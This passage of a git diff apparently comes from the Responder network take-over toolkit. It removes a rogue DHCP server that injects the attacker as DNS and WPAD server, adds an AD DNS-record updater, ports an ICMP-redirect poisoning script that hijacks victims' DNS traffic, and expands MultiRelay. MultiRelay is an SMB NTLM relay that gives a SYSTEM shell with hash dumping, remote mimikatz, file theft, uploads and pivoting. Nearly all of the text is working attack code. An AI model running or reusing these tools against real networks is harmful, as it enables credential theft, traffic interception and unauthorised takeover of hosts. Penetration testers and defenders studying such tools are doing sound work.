MacAddrStr, '0x'+PTid.encode('hex')) - elif OpCode == "\x03" and Respond_To_Requests: # DHCP Request - IP = FindIP(data) - if IP: - IPConv = socket.inet_ntoa(IP) - if RespondToThisIP(IPConv): - IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=IP) - Packet = DHCPACK(Tid=PTid, ClientMac=MacAddr, GiveClientIP=IP, ElapsedSec=Seconds) - Packet.calculate() - Buffer = UDP(Data = Packet) - Buffer.calculate() - SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 68)) - return 'Acknowledged DHCP Request for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex')) - elif OpCode == "\x01" and Respond_To_Requests: # DHCP Discover - IP = FindIP(data) - if IP: - IPConv = socket.inet_ntoa(IP) - if RespondToThisIP(IPConv): - IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=IP) - Packet = DHCPACK(Tid=PTid, ClientMac=MacAddr, GiveClientIP=IP, DHCPOpCode="\x02", ElapsedSec=Seconds) - Packet.calculate() - Buffer = UDP(Data = Packet) - Buffer.calculate() - SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 0)) - return 'Acknowledged DHCP Discover for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex')) - -def SendDHCP(packet,Host): - s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) - s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) - s.sendto(packet, Host) - -if __name__ == "__main__": - s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW) - s.bind((Interface, 0x0800)) - - while True: - try: - data = s.recvfrom(65535) - if data[0][23:24] == "\x11": # is udp? - SrcIP, SrcPort, DstIP, DstPort = ParseSrcDSTAddr(data) - - if SrcPort == 67 or DstPort == 67: - ret = ParseDHCPCode(data[0][42:]) - if ret: - print text("[DHCP] %s" % ret) - - except KeyboardInterrupt: - sys.exit("\r%s Exiting..." % color('[*]', 2, 1)) - diff --git a/tools/DHCP_Auto.sh b/tools/DHCP_Auto.sh deleted file mode 100644 index 1b5d1f2..0000000 --- a/tools/DHCP_Auto.sh +++ /dev/null @@ -1,63 +0,0 @@ -#!/bin/bash -# This file is part of Responder. laurent.gaffie@gmail.com -# -# -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . - -# This script will try to auto-detect network parameters -# to run the rogue DHCP server, to inject only your IP -# address as the primary DNS server and WPAD server and -# leave everything else normal. - -if [ -z $1 ]; then - echo "usage: $0 " - exit -fi - -if [ $EUID -ne 0 ]; then - echo "Must be run as root." - exit -fi - -if [ ! -d "/sys/class/net/$1" ]; then - echo "Interface does not exist." - exit -fi - -INTF=$1 -PATH="$PATH:/sbin" -IPADDR=`ifconfig $INTF | sed -n 's/inet addr/inet/; s/inet[ :]//p' | awk '{print $1}'` -NETMASK=`ifconfig $INTF | sed -n 's/.*[Mm]ask[: ]//p' | awk '{print $1}'` -DOMAIN=`grep -E "^domain |^search " /etc/resolv.conf | sort | head -1 | awk '{print $2}'` -DNS1=$IPADDR -DNS2=`grep ^nameserver /etc/resolv.conf | head -1 | awk '{print $2}'` -ROUTER=`route -n | grep ^0.0.0.0 | awk '{print $2}'` -WPADSTR="http://$IPADDR/wpad.dat" -if [ -z "$DOMAIN" ]; then - DOMAIN=" " -fi - -echo "Running with parameters:" -echo "INTERFACE: $INTF" -echo "IP ADDR: $IPADDR" -echo "NETMAST: $NETMASK" -echo "ROUTER IP: $ROUTER" -echo "DNS1 IP: $DNS1" -echo "DNS2 IP: $DNS2" -echo "WPAD: $WPADSTR" -echo "" - - -echo python DHCP.py -I $INTF -r $ROUTER -p $DNS1 -s $DNS2 -n $NETMASK -d \"$DOMAIN\" -w \"$WPADSTR\" -python DHCP.py -I $INTF -r $ROUTER -p $DNS1 -s $DNS2 -n $NETMASK -d \"$DOMAIN\" -w \"$WPADSTR\" diff --git a/tools/DNSUpdate.py b/tools/DNSUpdate.py new file mode 100644 index 0000000..23b0791 --- /dev/null +++ b/tools/DNSUpdate.py @@ -0,0 +1,185 @@ +#!/usr/bin/env python + +import sys +import argparse +import getpass +import re +import socket +from impacket.structure import Structure +import ldap3 +import dns.resolver +from collections import defaultdict + + +class DNS_RECORD(Structure): + """ + dnsRecord - used in LDAP [MS-DNSP] section 2.3.2.2 + impacket based structure, all of the below are tuples in format (fieldName, format) + """ + structure = ( + ('DataLength', 'L'), + ('Reserved', '. -import sys -import os -import datetime -import struct -import socket - -sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))) -from packets import SMB2Header, SMB2Nego, SMB2NegoData - -def GetBootTime(data): - Filetime = int(struct.unpack('i", len(Packet)) + Packet - s.send(Buffer) - - try: - data = s.recv(1024) - if data[4:5] == "\xff": - print "This host doesn't support SMBv2" - if data[4:5] == "\xfe": - IsDCVuln(GetBootTime(data[116:124])) - except Exception: - s.close() - raise - -if __name__ == "__main__": - if len(sys.argv)<=1: - sys.exit('Usage: python '+sys.argv[0]+' DC-IP-address') - host = sys.argv[1],445 - run(host) diff --git a/tools/FindSQLSrv.py b/tools/FindSQLSrv.py index c8affa1..58dedf9 100755 --- a/tools/FindSQLSrv.py +++ b/tools/FindSQLSrv.py @@ -1,5 +1,5 @@ #!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools +# This file is part of Responder, a network take-over set of tools # created and maintained by Laurent Gaffie. # email: laurent.gaffie@gmail.com # This program is free software: you can redistribute it and/or modify @@ -16,25 +16,23 @@ # along with this program. If not, see . from socket import * -print 'MSSQL Server Finder 0.1' +print('MSSQL Server Finder 0.3') s = socket(AF_INET,SOCK_DGRAM) s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1) -s.settimeout(2) -s.sendto('\x02',('255.255.255.255',1434)) +s.settimeout(5) +s.sendto(b'\x02',('255.255.255.255',1434)) try: - while 1: - data, address = s.recvfrom(8092) - if not data: - break - else: - print "===============================================================" - print "Host details:",address[0] - print data[2:] - print "===============================================================" - print "" + while 1: + data, address = s.recvfrom(8092) + if not data: + break + else: + print("===============================================================") + print(("Host details: %s"%(address[0]))) + print((data[2:]).decode('latin-1')) + print("===============================================================") + print("") except: - pass - - + pass diff --git a/tools/Icmp-Redirect.py b/tools/Icmp-Redirect.py index 4ff10ca..c0afc5e 100755 --- a/tools/Icmp-Redirect.py +++ b/tools/Icmp-Redirect.py @@ -1,5 +1,5 @@ #!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools +# This file is part of Responder, a network take-over set of tools # created and maintained by Laurent Gaffie. # email: laurent.gaffie@gmail.com # This program is free software: you can redistribute it and/or modify @@ -19,14 +19,16 @@ import struct import optparse import pipes import sys +import codecs from socket import * sys.path.append('../') from odict import OrderedDict from random import randrange from time import sleep from subprocess import call -from packets import Packet +if (sys.version_info < (3, 0)): + sys.exit('This script is meant to be run with Python3') parser = optparse.OptionParser(usage='python %prog -I eth0 -i 10.20.30.40 -g 10.20.30.254 -t 10.20.30.48 -r 10.20.40.1', prog=sys.argv[0], ) @@ -40,23 +42,23 @@ parser.add_option('-a', '--alternate',action="store", help="The alternate gatewa options, args = parser.parse_args() if options.OURIP is None: - print "-i mandatory option is missing.\n" + print("-i mandatory option is missing.\n") parser.print_help() exit(-1) elif options.OriginalGwAddr is None: - print "-g mandatory option is missing, please provide the original gateway address.\n" + print("-g mandatory option is missing, please provide the original gateway address.\n") parser.print_help() exit(-1) elif options.VictimIP is None: - print "-t mandatory option is missing, please provide a target.\n" + print("-t mandatory option is missing, please provide a target.\n") parser.print_help() exit(-1) elif options.Interface is None: - print "-I mandatory option is missing, please provide your network interface.\n" + print("-I mandatory option is missing, please provide your network interface.\n") parser.print_help() exit(-1) elif options.ToThisHost is None: - print "-r mandatory option is missing, please provide a destination target.\n" + print("-r mandatory option is missing, please provide a destination target.\n") parser.print_help() exit(-1) @@ -78,13 +80,53 @@ def Show_Help(ExtraHelpData): MoreHelp = "Note that if the target is Windows, the poisoning will only last for 10mn, you can re-poison the target by launching this utility again\nIf you wish to respond to the traffic, for example DNS queries your target issues, launch this command as root:\n\niptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst %s --dport 53 -j DNAT --to-destination %s:53\n\n"%(ToThisHost,OURIP) +#Python version +if (sys.version_info > (3, 0)): + PY2OR3 = "PY3" +else: + PY2OR3 = "PY2" + +def StructWithLenPython2or3(endian,data): + #Python2... + if PY2OR3 == "PY2": + return struct.pack(endian, data) + #Python3... + else: + return struct.pack(endian, data).decode('latin-1') + +def NetworkSendBufferPython2or3(data): + if PY2OR3 == "PY2": + return str(data) + else: + return bytes(str(data), 'latin-1') + +def NetworkRecvBufferPython2or3(data): + if PY2OR3 == "PY2": + return str(data) + else: + return str(data.decode('latin-1')) + def GenCheckSum(data): s = 0 for i in range(0, len(data), 2): q = ord(data[i]) + (ord(data[i+1]) << 8) f = s + q s = (f & 0xffff) + (f >> 16) - return struct.pack("H", len(CalculateLen)) + self.fields["Len"] = StructWithLenPython2or3(">H", len(CalculateLen)) # Then CheckSum this packet CheckSumCalc =str(self.fields["VLen"])+str(self.fields["DifField"])+str(self.fields["Len"])+str(self.fields["TID"])+str(self.fields["Flag"])+str(self.fields["FragOffset"])+str(self.fields["TTL"])+str(self.fields["Cmd"])+str(self.fields["CheckSum"])+str(self.fields["SrcIP"])+str(self.fields["DestIP"]) self.fields["CheckSum"] = GenCheckSum(CheckSumCalc) @@ -160,7 +202,7 @@ class ICMPRedir(Packet): ]) def calculate(self): - self.fields["GwAddr"] = inet_aton(OURIP) + self.fields["GwAddr"] = inet_aton(OURIP).decode('latin-1') CheckSumCalc =str(self.fields["Type"])+str(self.fields["OpCode"])+str(self.fields["CheckSum"])+str(self.fields["GwAddr"])+str(self.fields["Data"]) self.fields["CheckSum"] = GenCheckSum(CheckSumCalc) @@ -177,27 +219,27 @@ def ReceiveArpFrame(DstAddr): s.settimeout(5) Protocol = 0x0806 s.bind((Interface, Protocol)) - OurMac = s.getsockname()[4] + OurMac = s.getsockname()[4].decode('latin-1') Eth = EthARP(SrcMac=OurMac) Arp = ARPWhoHas(DstIP=DstAddr,SenderMac=OurMac) Arp.calculate() final = str(Eth)+str(Arp) try: - s.send(final) + s.send(NetworkSendBufferPython2or3(final)) data = s.recv(1024) DstMac = data[22:28] - DestMac = DstMac.encode('hex') - PrintMac = ":".join([DestMac[x:x+2] for x in xrange(0, len(DestMac), 2)]) - return PrintMac,DstMac + DestMac = codecs.encode(DstMac, 'hex') + PrintMac = ":".join([DestMac[x:x+2].decode('latin-1') for x in range(0, len(DestMac), 2)]) + return PrintMac,DstMac.decode('latin-1') except: - print "[ARP]%s took too long to Respond. Please provide a valid host.\n"%(DstAddr) + print("[ARP]%s took too long to Respond. Please provide a valid host.\n"%(DstAddr)) exit(1) def IcmpRedirectSock(DestinationIP): PrintMac,DestMac = ReceiveArpFrame(VictimIP) - print '[ARP]Target Mac address is :',PrintMac + print('[ARP]Target Mac address is :',PrintMac) PrintMac,RouterMac = ReceiveArpFrame(OriginalGwAddr) - print '[ARP]Router Mac address is :',PrintMac + print('[ARP]Router Mac address is :',PrintMac) s = socket(AF_PACKET, SOCK_RAW) Protocol = 0x0800 s.bind((Interface, Protocol)) @@ -209,12 +251,12 @@ def IcmpRedirectSock(DestinationIP): IPPack = IPPacket(SrcIP=OriginalGwAddr,DestIP=VictimIP,TTL="\x40",Data=str(ICMPPack)) IPPack.calculate() final = str(Eth)+str(IPPack) - s.send(final) - print '\n[ICMP]%s should have been poisoned with a new route for target: %s.\n'%(VictimIP,DestinationIP) + s.send(NetworkSendBufferPython2or3(final)) + print('\n[ICMP]%s should have been poisoned with a new route for target: %s.\n'%(VictimIP,DestinationIP)) def FindWhatToDo(ToThisHost2): if ToThisHost2 != None: - Show_Help('Hit CRTL-C to kill this script') + Show_Help('Hit CTRL-C to kill this script') RunThisInLoop(ToThisHost, ToThisHost2,OURIP) if ToThisHost2 == None: Show_Help(MoreHelp) @@ -227,11 +269,11 @@ def RunThisInLoop(host, host2, ip): ouripadd = pipes.quote(ip) call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns1+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True) call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns2+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True) - print "[+]Automatic mode enabled\nAn iptable rules has been added for both DNS servers." + print("[+]Automatic mode enabled\nAn iptable rules has been added for both DNS servers.") while True: IcmpRedirectSock(DestinationIP=dns1) IcmpRedirectSock(DestinationIP=dns2) - print "[+]Repoisoning the target in 8 minutes..." + print("[+]Repoisoning the target in 8 minutes...") sleep(480) FindWhatToDo(ToThisHost2) diff --git a/tools/MultiRelay.py b/tools/MultiRelay.py index e166487..cabbf17 100755 --- a/tools/MultiRelay.py +++ b/tools/MultiRelay.py @@ -1,5 +1,6 @@ #!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools +# -*- coding: latin-1 -*- +# This file is part of Responder, a network take-over set of tools # created and maintained by Laurent Gaffie. # email: laurent.gaffie@gmail.com # This program is free software: you can redistribute it and/or modify @@ -15,39 +16,72 @@ # You should have received a copy of the GNU General Public License # along with this program. If not, see . import sys +if (sys.version_info > (3, 0)): + PY2OR3 = "PY3" +else: + PY2OR3 = "PY2" + sys.exit("For now MultiRelay only supports python 3. Try python3 MultiRelay.py ...") import re import os import logging import optparse import time +import random +import subprocess from threading import Thread -from SocketServer import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler +if PY2OR3 == "PY3": + from socketserver import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler +else: + from SocketServer import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler + try: from Crypto.Hash import MD5 except ImportError: - print "\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes." - print "You can install it on debian based os with this command: apt-get install python-crypto" - print "The Sam file will be saved anyway and you will have the bootkey.\033[0m\n" - + print("\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes.") + print("You can install it on debian based os with this command: apt-get install python-crypto") + print("The Sam file will be saved anyway and you will have the bootkey.\033[0m\n") +try: + import readline +except: + print("Warning: readline module is not available, you will not be able to use the arrow keys for command history") + pass from MultiRelay.RelayMultiPackets import * from MultiRelay.RelayMultiCore import * - -from SMBFinger.Finger import RunFinger +from SMBFinger.Finger import RunFinger,ShowSigning,RunPivotScan sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../'))) from socket import * -__version__ = "1.2" +__version__ = "2.5" + + +MimikatzFilename = "./MultiRelay/bin/mimikatz.exe" +Mimikatzx86Filename = "./MultiRelay/bin/mimikatz_x86.exe" +RunAsFileName = "./MultiRelay/bin/Runas.exe" +SysSVCFileName = "./MultiRelay/bin/Syssvc.exe" + +def color(txt, code = 1, modifier = 0): + return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt) + +if os.path.isfile(SysSVCFileName) is False: + print(color("[!]MultiRelay/bin/ folder is empty. You need to run these commands:\n",1,1)) + print(color("apt-get install gcc-mingw-w64-x86-64",2,1)) + print(color("x86_64-w64-mingw32-gcc ./MultiRelay/bin/Runas.c -o ./MultiRelay/bin/Runas.exe -municode -lwtsapi32 -luserenv",2,1)) + print(color("x86_64-w64-mingw32-gcc ./MultiRelay/bin/Syssvc.c -o ./MultiRelay/bin/Syssvc.exe -municode",2,1)) + print(color("\nAdditionally, you can add your custom mimikatz executables (mimikatz.exe and mimikatz_x86.exe)\nin the MultiRelay/bin/ folder for the mimi32/mimi command.",3,1)) + sys.exit() def UserCallBack(op, value, dmy, parser): args=[] for arg in parser.rargs: if arg[0] != "-": args.append(arg) + if arg[0] == "-": + break if getattr(parser.values, op.dest): args.extend(getattr(parser.values, op.dest)) setattr(parser.values, op.dest, args) -parser = optparse.OptionParser(usage="python %prog -t10.20.30.40 -u Administrator lgandx admin", version=__version__, prog=sys.argv[0]) +parser = optparse.OptionParser(usage="\npython %prog -t 10.20.30.40 -u Administrator lgandx admin\npython %prog -t 10.20.30.40 -u ALL", version=__version__, prog=sys.argv[0]) parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET") parser.add_option('-p',action="store", help="Additional port to listen on, this will relay for proxy, http and webdav incoming packets.",metavar="8081",dest="ExtraPort") parser.add_option('-u', '--UserToRelay', help="Users to relay. Use '-u ALL' to relay all users.", action="callback", callback=UserCallBack, dest="UserToRelay") @@ -57,67 +91,105 @@ parser.add_option('-d', '--dump', action="store_true", help="Dump hashes (script options, args = parser.parse_args() if options.TARGET is None: - print "\n-t Mandatory option is missing, please provide a target.\n" + print("\n-t Mandatory option is missing, please provide a target.\n") parser.print_help() exit(-1) if options.UserToRelay is None: - print "\n-u Mandatory option is missing, please provide a username to relay.\n" + print("\n-u Mandatory option is missing, please provide a username to relay.\n") parser.print_help() exit(-1) if options.ExtraPort is None: options.ExtraPort = 0 -OneCommand = options.OneCommand -Dump = options.Dump -ExtraPort = options.ExtraPort -UserToRelay = options.UserToRelay -Host = options.TARGET, 445 -Cmd = [] -ShellOpen = [] +if not os.geteuid() == 0: + print(color("[!] MultiRelay must be run as root.")) + sys.exit(-1) -def color(txt, code = 1, modifier = 0): - return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt) +OneCommand = options.OneCommand +Dump = options.Dump +ExtraPort = options.ExtraPort +UserToRelay = options.UserToRelay + +Host = [options.TARGET] +Cmd = [] +ShellOpen = [] +Pivoting = [2] def ShowWelcome(): - print color('\nResponder MultiRelay to SMB NTLMv1/2',8,1) - print color('Version: '+__version__,8,1) - print '\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com' - print 'Usernames to relay (-u) are case sensitive.' - print 'To kill this script hit CRTL-C.\n' - print 'Use this script in combination with Responder.py for best results.' - print 'This tool listen on TCP port 80, 3128 and 445.' - print 'Make sure nothing use these ports.\n' - print 'For optimal pwnage, launch Responder with only these 2 options:' - print '-rv\nRunning psexec style commands can be noisy in the event viewer,' - print 'if anyone ever reads it.. If you want to leave no trace in the' - print 'event viewer, use Responder\'s built-in commands. They silently' - print 'perform the tasks requested, including the hashdump command.' - print color('\nRelaying credentials for these users:',8,1) - print color(UserToRelay,4,1) - print '\n' + print(color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1)) + print('\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com') + print('Usernames to relay (-u) are case sensitive.') + print('To kill this script hit CTRL-C.\n') + print(color('/*',8,1)) + print('Use this script in combination with Responder.py for best results.') + print('Make sure to set SMB and HTTP to OFF in Responder.conf.\n') + print('This tool listen on TCP port 80, 3128 and 445.') + print('For optimal pwnage, launch Responder only with these 2 options:') + print('-rv\nAvoid running a command that will likely prompt for information like net use, etc.') + print('If you do so, use taskkill (as system) to kill the process.') + print(color('*/',8,1)) + print(color('\nRelaying credentials for these users:',8,1)) + print(color(UserToRelay,4,1)) + print('\n') ShowWelcome() def ShowHelp(): - print color('Available commands:',8,0) - print color('dump',8,1)+' -> Extract the SAM database and print hashes.' - print color('regdump KEY',8,1)+' -> Dump an HKLM registry key (eg: regdump SYSTEM)' - print color('read Path_To_File',8,1)+' -> Read a file (eg: read /windows/win.ini)' - print color('get Path_To_File',8,1)+' -> Download a file (eg: get users/administrator/desktop/password.txt)' - print color('help',8,1)+' -> Print this message.' - print color('exit',8,1)+' -> Exit this shell and return in relay mode.' - print ' If you want to quit type exit and then use CRTL-C\n' - print color('Any other command than that will be run as SYSTEM on the target.\n',8,1) + print(color('Available commands:',8,0)) + print(color('dump',8,1)+' -> Extract the SAM database and print hashes.') + print(color('regdump KEY',8,1)+' -> Dump an HKLM registry key (eg: regdump SYSTEM)') + print(color('read Path_To_File',8,1)+' -> Read a file (eg: read /windows/win.ini)') + print(color('get Path_To_File',8,1)+' -> Download a file (eg: get users/administrator/desktop/password.txt)') + print(color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)') + print(color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\') + print(color('runas Command',8,1)+' -> Run a command as the currently logged in user. (eg: runas whoami)') + print(color('scan /24',8,1)+' -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to') + print(color('pivot IP address',8,1)+' -> Connect to another host (eg: pivot 10.0.0.12)') + print(color('mimi command',8,1)+' -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)') + print(color('mimi32 command',8,1)+' -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)') + print(color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)') + print(color('help',8,1)+' -> Print this message.') + print(color('exit',8,1)+' -> Exit this shell and return in relay mode.') + print(' If you want to quit type exit and then use CTRL-C\n') + print(color('Any other command than that will be run as SYSTEM on the target.\n',8,1)) Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../" Logs = logging -Logs.basicConfig(filemode="a",filename=Logs_Path+'logs/SMBRelay-Session.txt',level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p') +Logs.basicConfig(filemode="w",filename=Logs_Path+'logs/SMBRelay-Session.txt',level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p') + +def NetworkSendBufferPython2or3(data): + if PY2OR3 == "PY2": + return str(data) + else: + return bytes(str(data), 'latin-1') + +def NetworkRecvBufferPython2or3(data): + if PY2OR3 == "PY2": + return str(data) + else: + return str(data.decode('latin-1')) + +def StructPython2or3(endian,data): + #Python2... + if PY2OR3 == "PY2": + return struct.pack(endian, len(data)) + #Python3... + else: + return struct.pack(endian, len(data)).decode('latin-1') + +def UploadContent(File): + with open(File,'rb') as f: + s = f.read() + FileLen = len(s.decode('latin-1')) + FileContent = s.decode('latin-1') + return FileLen, FileContent try: RunFinger(Host[0]) except: - print "The host %s seems to be down or port 445 down."%(Host[0]) + raise + print("The host %s seems to be down or port 445 down."%(Host[0])) sys.exit(1) @@ -125,42 +197,49 @@ def get_command(): global Cmd Cmd = [] while any(x in Cmd for x in Cmd) is False: - Cmd = [raw_input("C:\\Windows\\system32\\:#")] + Cmd = [input("C:\\Windows\\system32\\:#")] #Function used to make sure no connections are accepted while we have an open shell. #Used to avoid any possible broken pipe. def IsShellOpen(): #While there's nothing in our array return false. if any(x in ShellOpen for x in ShellOpen) is False: - return False + return False #If there is return True. else: - return True + return True + +#Function used to make sure no connections are accepted on HTTP and HTTP_Proxy while we are pivoting. +def IsPivotOn(): + #While there's nothing in our array return false. + if Pivoting[0] == "2": + return False + #If there is return True. + if Pivoting[0] == "1": + print("pivot is on") + return True def ConnectToTarget(): + try: + s = socket(AF_INET, SOCK_STREAM) + s.connect((Host[0],445)) + return s + except: try: - s = socket(AF_INET, SOCK_STREAM) - #Override TCP keep-alives - s.setsockopt(SOL_SOCKET, SO_KEEPALIVE, 1) - s.setsockopt(IPPROTO_TCP, TCP_KEEPCNT, 15) - s.setsockopt(IPPROTO_TCP, TCP_KEEPINTVL, 5) - # macOS does not have TCP_KEEPIDLE - if sys.platform != 'darwin': - s.setsockopt(IPPROTO_TCP, TCP_KEEPIDLE, 5) - s.connect(Host) - return s - except: - "Cannot connect to target, host down?" sys.exit(1) + print("Cannot connect to target, host down?") + except: + pass class HTTPProxyRelay(BaseRequestHandler): - - def handle(self): + def handle(self): try: #Don't handle requests while a shell is open. That's the goal after all. if IsShellOpen(): - return None + return None + if IsPivotOn(): + return None except: raise @@ -176,84 +255,85 @@ class HTTPProxyRelay(BaseRequestHandler): NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) ##Make sure incoming packet is an NTLM auth, if not send HTTP 407. - if NTLM_Auth: + if NTLM_Auth: #Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth) - Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9] + Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9] - if Packet_NTLM == "\x01": - ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target. - h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x07\xc8") - n = SMBNegoCairo(Data = SMBNegoCairoData()) - n.calculate() - packet0 = str(h)+str(n) - buffer0 = longueur(packet0)+packet0 - s.send(buffer0) - smbdata = s.recv(2048) - ##Session Setup AndX Request, NTLMSSP_NEGOTIATE - if smbdata[8:10] == "\x72\x00": - head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",mid="\x02\x00") - t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))# - t.calculate() + if Packet_NTLM == "\x01": + ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target. + h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8") + n = SMBNegoCairo(Data = SMBNegoCairoData()) + n.calculate() + packet0 = str(h)+str(n) + buffer0 = longueur(packet0)+packet0 + s.send(buffer0) + smbdata = s.recv(2048) + ##Session Setup AndX Request, NTLMSSP_NEGOTIATE + if smbdata[8:10] == "\x72\x00": + head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00") + t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))# + t.calculate() + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) + smbdata = s.recv(2048) #got it here. + + ## Send HTTP Proxy + Buffer_Ans = WPAD_NTLM_Challenge_Ans() + Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb + key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing). + self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client. + data = self.request.recv(8092) + NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) + Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9] + + ##Got NTLM Message 3 from client. + if Packet_NTLM == "\x03": + NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth)) + ##Might be anonymous, verify it and if so, send no go to client. + if IsSMBAnonymous(NTLM_Auth): + Response = WPAD_Auth_407_Ans() + self.request.send(str(Response)) + data = self.request.recv(8092) + else: + #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login + #and has not attempted before. While at it, let's grab his hash. + Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host[0],Pivoting) + if Username is not None: + head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34],mid="\x03\x00") + t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay. + t.calculate() packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(buffer1) - smbdata = s.recv(2048) #got it here. - - ## Send HTTP Proxy - Buffer_Ans = WPAD_NTLM_Challenge_Ans() - Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb - key = ExtractHTTPChallenge(smbdata)#Grab challenge key for later use (hash parsing). - self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client. - data = self.request.recv(8092) - NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) - Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9] + buffer1 = longueur(packet1)+packet1 + print("[+] SMB Session Auth sent.") + s.send(NetworkSendBufferPython2or3(buffer1)) + smbdata = s.recv(2048) + RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) + if RunCmd is None: + s.close() + self.request.close() + return None - ##Got NTLM Message 3 from client. - if Packet_NTLM == "\x03": - NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth)) - ##Might be anonymous, verify it and if so, send no go to client. - if IsSMBAnonymous(NTLM_Auth): - Response = WPAD_Auth_407_Ans() - self.request.send(str(Response)) - data = self.request.recv(8092) - else: - #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login - #and has not attempted before. While at it, let's grab his hash. - Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host) - - if Username is not None: - head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",uid=smbdata[32:34],mid="\x03\x00") - t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay. - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - print "[+] SMB Session Auth sent." - s.send(buffer1) - smbdata = s.recv(2048) - RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) - if RunCmd is None: - s.close() - return None - - else: + else: ##Any other type of request, send a 407. Response = WPAD_Auth_407_Ans() - self.request.send(str(Response)) + self.request.send(str(Response)) except Exception: - self.request.close() + self.request.close() ##No need to print anything (timeouts, rst, etc) to the user console.. - pass + pass class HTTPRelay(BaseRequestHandler): - - def handle(self): + def handle(self): try: #Don't handle requests while a shell is open. That's the goal after all. if IsShellOpen(): - return None + return None + if IsPivotOn(): + return None except: raise 